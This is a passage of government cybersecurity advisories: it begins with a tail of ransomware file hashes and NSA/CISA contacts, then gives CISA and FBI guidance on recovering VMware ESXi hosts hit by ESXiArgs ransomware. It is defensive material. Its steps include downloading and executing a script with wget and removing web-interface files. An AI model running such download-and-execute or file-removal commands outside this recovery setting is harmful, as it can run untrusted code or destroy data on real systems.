c50b839f2fc3ce5a385b9ae1c05def3a 458d258005f39d72ce47c111a7d17e8c52fe5fc7dd98575771640d9009385456
a452a5f693036320b580d28ee55ae2a3 99b0056b7cc2e305d4ccb0ac0a8a270d3fceb21ef6fc2eb13521a930cea8bd9f
a6e1efd70a077be032f052bb75544358 3b9fe1713f638f85f20ea56fd09d20a96cd6d288732b04b073248b56cdaef878
802e7d6e80d7a60e17f9ffbd62fcbbeb 87bdb1de1dd6b0b75879d8b8aef80b562ec4fad365d7abbc629bcfc1d386afa6
-- 0054147db54544d77a9efd9baf5ec96a80b430e170d6e7c22fcf75261e9a3a71

Table 4 lists MD5 and SHA256 hashes associated with H0lyGh0st Ransomware files.

SHA256 Hash
99fc54786a72f32fd44c7391c2171ca31e72ca52725c68e2dde94d04c286fccd*
F8fc2445a9814ca8cf48a979bff7f182d6538f4d1ff438cf259268e8b4b76f86*
Bea866b327a2dc2aa104b7ad7307008919c06620771ec3715a059e675d9f40af*
6e20b73a6057f8ff75c49e1b7aef08abfcfe4e418e2c1307791036f081335c2d
f4d10b08d7dacd8fe33a6b54a0416eecdaed92c69c933c4a5d3700b8f5100fad
541825cb652606c2ea12fd25a842a8b3456d025841c3a7f563655ef77bb67219
2d978df8df0cf33830aba16c6322198e5889c67d49b40b1cb1eb236bd366826d
414ed95d14964477bebf86dced0306714c497cde14dede67b0c1425ce451d3d7

Df0c7bb88e3c67d849d78d13cee30671b39b300e0cda5550280350775d5762d8

MD5 Hash
a2c2099d503fcc29478205f5aef0283b
9c516e5b95a7e4169ecbd133ed4d205f
d6a7b5db62bf7815a10a17cdf7ddbd4b
c6949a99c60ef29d20ac8a9a3fb58ce5
4b20641c759ed563757cdd95c651ee53
25ee4001eb4e91f7ea0bc5d07f2a9744
18126be163eb7df2194bb902c359ba8e
eaf6896b361121b2c315a35be837576d
e4ee611533a28648a350f2dab85bb72a
e268cb7ab778564e88d757db4152b9fa

* from Microsoft blog post on h0lygh0st

CONTACT INFORMATION

NSA Client Requirements / General Cybersecurity Inquiries: CybersecurityReports@nsa.gov
Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov
To report incidents and anomalous activity related to information found in this Joint Cybersecurity Advisory, contact CISA’s 24/7 Operations Center at Report@cisa.gov or (888) 282-0870 or your local FBI field office at www.fbi.gov/contact-us/field. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.

Media Inquiries / Press Desk:

February 16, 2023

ESXiArgs Ransomware Virtual Machine Recovery Guidance | CISA

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) in response to the ongoing ransomware campaign, known as “ESXiArgs.” Malicious actors may be exploiting known vulnerabilities in VMware ESXi servers that are likely running unpatched and out-of-service or out-of-date versions of VMware ESXi software to gain access and deploy ransomware. The ESXiArgs ransomware encrypts configuration files on ESXi servers, potentially rendering virtual machines (VMs) unusable. 

CISA has released an ESXiArgs recovery script at github.com/cisagov/ESXiArgs-Recover. Organizations that have fallen victim to ESXiArgs ransomware can use this script to attempt to recover their files. This CSA provides guidance on how to use the script.
ESXiArgs actors have compromised over 3,800 servers globally. CISA and FBI encourage all organizations managing VMware ESXi servers to: 

  • Update servers to the latest version of VMware ESXi software
  • Harden ESXi hypervisors by disabling the Service Location Protocol (SLP) service, and 
  • Ensure the ESXi hypervisor is not exposed to the public internet. 

If malicious actors have compromised your organization with ESXiArgs ransomware, CISA and FBI recommend following the script and guidance provided in this CSA to attempt to recover access to your files.  

Download the PDF version of this report: 

Note: CISA and FBI will update this CSA as more information becomes available.

Technical Details

Open-source reporting indicates that malicious actors are exploiting known vulnerabilities in VMware ESXi software to gain access to servers and deploy ESXiArgs ransomware. The actors are likely targeting end-of-life ESXi servers or ESXi servers that do not have the available ESXi software patches applied.[1] 

ESXiArgs ransomware encrypts certain configuration files on ESXi servers, potentially rendering VMs unusable. Specifically, the ransomware encrypts configuration files associated with the VMs; it does not encrypt flat files. As a result, it is possible, in some cases, for victims to reconstruct the encrypted configuration files based on the unencrypted flat file. The recovery script documented below automates the process of recreating configuration files. The full list of file extensions encrypted by the malware is: vmdkvmxvmxfvmsdvmsnvswpvmssnvramvmem.

Recovery Guidance

CISA and FBI do not encourage paying the ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, CISA and FBI urge you to promptly report ransomware incidents to a local FBI Field Office, or to CISA at cisa.gov/report

CISA is providing these steps to enable organizations to attempt recovery of their VMs. CISA’s GitHub ESXiArgs recovery script, which also outlines these steps, is available at github.com/cisagov/ESXiArgs-Recover. CISA is aware that some organizations have reported success in recovering files without paying ransoms. CISA’s script is based on findings published by third-party researchers.[2] 

Any organization seeking to use CISA’s ESXiArgs recovery script should carefully review the script to determine if it is appropriate for their environment before deploying it. This script does not seek to delete the encrypted configuration files, but instead seeks to create new configuration files that enable access to the VMs. While CISA works to ensure that scripts like this one are safe and effective, this script is delivered without warranty, either implicit or explicit. Do not use this script without understanding how it may affect your system. CISA does not assume liability for damage caused by this script. Note: Organizations that run into problems with the script can create a GitHub issue at https://github.com/cisagov/ESXiArgs-Recover/issues; CISA will do our best to resolve concerns.

  1. Quarantine or take affected hosts offline to ensure that repeat infection does not occur.
  2. Download CISA’s recovery script and save it as /tmp/recover.sh.
    For example, with wgetwget -O /tmp/recover.sh https://raw.githubusercontent.com/cisagov/ESXiArgs-Recover/main/recover.sh.
  3. Give the script execute permissions: chmod +x /tmp/recover.sh
  4. Navigate to the folder of a VM you would like to recover and run ls to view the files.
    • Note: You may browse these folders by running ls /vmfs/volumes/datastore1. For instance, if the folder is called example, run cd /vmfs/volumes/datastore1/example.
  5. View files by running ls. Note the name of the VM (via naming convention: [name].vmdk).
  6. Run the recovery script with /tmp/recover.sh [name], where [name] is the name of the VM determined previously. 
    • If the VM is a thin format, run /tmp/recover.sh [name] thin.
    • If successful, the recovery script will output that it has successfully run. If unsuccessful, it may not be possible for the recovery script to recover your VMs; consider engaging external incident response help.
  7. If the script succeeded, re-register the VM.
    1. If the ESXi web interface is inaccessible, remove the ransom note and restore access via the following steps. (Note: Taking the steps below moves the ransom note to the file ransom.html. Consider archiving this file for future incident review.)
      • Run cd /usr/lib/vmware/hostd/docroot/ui/ && mv index.html ransom.html && mv index1.html index.html.
      • Run cd /usr/lib/vmware/hostd/docroot && mv index.html ransom.html && rm index.html && mv index1.html index.html.
      • Reboot the ESXi server (e.g., with the reboot command). After a few minutes, you should be able to navigate to the web interface.
      • In the ESXi web interface, navigate to the Virtual Machines page.
      • If the VM you restored already exists, right click on the VM and select Unregister (see figure 1).
Figure 1: Unregistering the virtual machine

Figure 1: Unregistering the virtual machine.

  • Select Create / Register VM (see figure 2).
  • Select Register an existing virtual machine (see figure 2).
Figure 2: Registering the virtual machine, selecting machine to register.

Figure 2: Registering the virtual machine, selecting machine to register.

Click Select one or more virtual machines, a datastore or a directory to navigate to the folder of the VM you restored. Select the vmx file in the folder (see figure 3).

Figure 3: Registering the virtual machine, finalizing registration.

Figure 3: Registering the virtual machine, finalizing registration.

Select Next and Finish. You should now be able to use the VM as normal.

Figure 3: Registering the virtual machine, finalizing registration.

Select Next and Finish. You should now be able to use the VM as normal.

  1. Update servers to the latest software version, disable the Service Location Protocol (SLP) service, and ensure the ESXi hypervisor is not configured to be exposed to the public internet before putting systems back online. 

Additional Incident Response

The above script only serves as a method to recover essential services. Although CISA and FBI have not seen any evidence that the actors have established persistence, we recommend organizations take the following additional incident response actions after applying the script:

  1. Review network logging to and from ESXi hosts and the guest VMs for unusual scanning activity.
  2. Review traffic from network segments occupied by the ESXi hosts and guests. Consider restricting non-essential traffic to and from these segments.

If you detect activity from the above, implement your incident response plan. CISA and FBI urge you to promptly report ransomware incidents to a local FBI Field Office, or to CISA at cisa.gov/report.

Organizations should also collect and review artifacts, such as running processes/services, unusual authentications, and recent network connections.

See the joint CSA from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. CISA also encourages government network administrators to see CISA’s Federal Government Cybersecurity Incident and Vulnerability Response Playbooks. Although tailored to federal civilian branch agencies, these playbooks provide operational procedures for planning and conducting cybersecurity incident and vulnerability response activities and detail steps for both incident and vulnerability response.  

Additional resources for recovering .vmdk files can be found on a third-party researcher’s website.[2]

Mitigations

Note: These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. For more information on the CPGs, including additional recommended baseline protections, see cisa.gov/cpg.

CISA and FBI recommend all organizations: 

  • Temporarily remove connectivity for the associated ESXi server(s).
    • Upgrade your ESXi servers to the latest version of VMware ESXi software [CPG 5.1]. ESXi releases are cumulative, and the latest builds are documented in VMware’s article, Build numbers and versions of VMware ESXi/ESX.
    • Harden ESXi hypervisors by disabling the Service Location Protocol (SLP) service, which ESXiArgs may leverage. For more information on executing workarounds, see VMware’s guidance How to Disable/Enable the SLP Service on VMware ESXi
    • Ensure your ESXi hypervisor is not configured to be exposed to the public internet.

In addition, CISA and FBI recommend organizations apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.

Preparing for Ransomware

  • Maintain offline backups of data, and regularly test backup and restoration [CPG 7.3]. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware incident and protect against data losses.
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
  • Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response procedures for a ransomware incident [CPG 7.1, 7.2].

 Mitigating and Preventing Ransomware

  • Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.
  • Require phishing-resistant MFA for as many services as possible [CPG 1.3]—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.
  • Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
  • Implement allow-listing policies for applications and remote access that only allow systems to execute known and permitted programs.
  • Open document readers in protected viewing modes to help prevent active content from running.
  • Implement user training program and phishing exercises to raise awareness among users about the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments. Reinforce the appropriate user response to phishing and spearphishing emails.
  • Use strong passwords [CPG 1.4] and avoid reusing passwords for multiple accounts. See CISA Tip Choosing and Protecting Passwords and the NIST’s Special Publication 800-63B: Digital Identity Guidelines for more information.
  • Require administrator credentials to install software [CPG 1.5].
  • Audit user accounts with administrative or elevated privileges and configure access controls with least privilege in mind [CPG 1.5].
  • Install and regularly update antivirus and antimalware software on all hosts.
  • Consider adding an email banner to messages coming from outside your organizations.
  • Disable hyperlinks in received emails.
  • Consider participating in CISA’s no-cost Automated Indicator Sharing (AIS) program to receive real-time exchange of machine-readable cyber threat indicators and defensive measures. 

Responding to Ransomware Incidents

If a ransomware incident occurs at your organization:

  • Follow your organization’s Ransomware Response Checklist (see Preparing for Ransomware section).
  • Scan backups. If possible, scan backup data with an antivirus program to check that it is free of malware. This should be performed using an isolated, trusted system to avoid exposing backups to potential compromise.
  • Follow the notification requirements as outlined in your cyber incident response plan.
  • Report incidents to CISA at cisa.gov/report, FBI at a local FBI Field Office, or the U.S. Secret Service (USSS) at a USSS Field Office.
  • Apply incident response best practices found in the joint Cybersecurity Advisory, Technical Approaches to Uncovering and Remediating Malicious Activity, developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.

Note: CISA and FBI strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities.

Resources 

See Stopransomware.gov, a whole-of-government approach, for ransomware resources and alerts.

Acknowledgements

CISA and FBI would like to thank VMware for their contributions to this CSA.

References

Revisions

February, 2023: Initial Version